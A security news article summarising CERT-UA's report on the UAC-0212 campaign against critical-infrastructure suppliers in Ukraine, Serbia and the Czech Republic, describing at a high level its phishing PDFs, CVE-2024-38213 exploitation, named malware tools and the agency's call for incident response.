UAC-0212: Hackers Unleash Devastating Cyber Attack on Critical Infrastructure

In a recent escalation of cyber threats, hackers have launched a targeted campaign, identified as UAC-0212, aimed at compromising critical infrastructure facilities in Ukraine.

This campaign, which began in the second half of 2024, involves sophisticated tactics to infiltrate the networks of developers and suppliers of automation and process control solutions.

The attackers’ ultimate goal is to disrupt the information and communication systems (ICS) of enterprises in vital sectors such as energy, water, and heat supply.

UAC-0212: Hackers Unleash Devastating Cyber Assault on Critical Infrastructure

The UAC-0212 campaign is notable for its use of novel techniques, including the distribution of PDF documents containing malicious links.

These links exploit the CVE-2024-38213 vulnerability, leading to the download of an LNK file.

Once executed, this file triggers a PowerShell command that displays a decoy document while secretly downloading and installing malicious EXE/DLL files.

Tools like SECONDBEST, EMPIREPAST, SPARK, and CROOKBAG have been identified as part of this operation.

Additionally, RSYNC is used for long-term document theft, highlighting the attackers’ intent to gather sensitive information.

The geography of the attack is extensive, with targets including companies from Serbia, the Czech Republic, and Ukraine.

Between July 2024 and February 2025, multiple logistics and equipment manufacturing companies were compromised.

The attackers often pose as potential customers, engaging in correspondence with victims over several days to gain trust before sending malicious documents.

This approach allows them to move quickly through the network, establishing persistence on servers and workstations within hours of initial compromise.

Impact and Response

The UAC-0212 campaign underscores the increasing threat to critical infrastructure worldwide.

Given the attackers’ ability to rapidly spread through networks, simply identifying and reinstalling affected systems is insufficient.

CERT-UA urges supplier companies to contact them for comprehensive technical investigations and incident response measures.

The agency provides cyber threat indicators and encourages vigilance among enterprises that may have been targeted.

As the threat landscape evolves, it is crucial for organizations to enhance their cybersecurity posture, particularly those involved in critical infrastructure.

The use of advanced threat detection tools and regular network audits can help mitigate such attacks.

The ongoing nature of these cyber operations highlights the need for continuous monitoring and collaboration between cybersecurity entities to counter emerging threats effectively.

Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response, and Threat Hunting - Register Here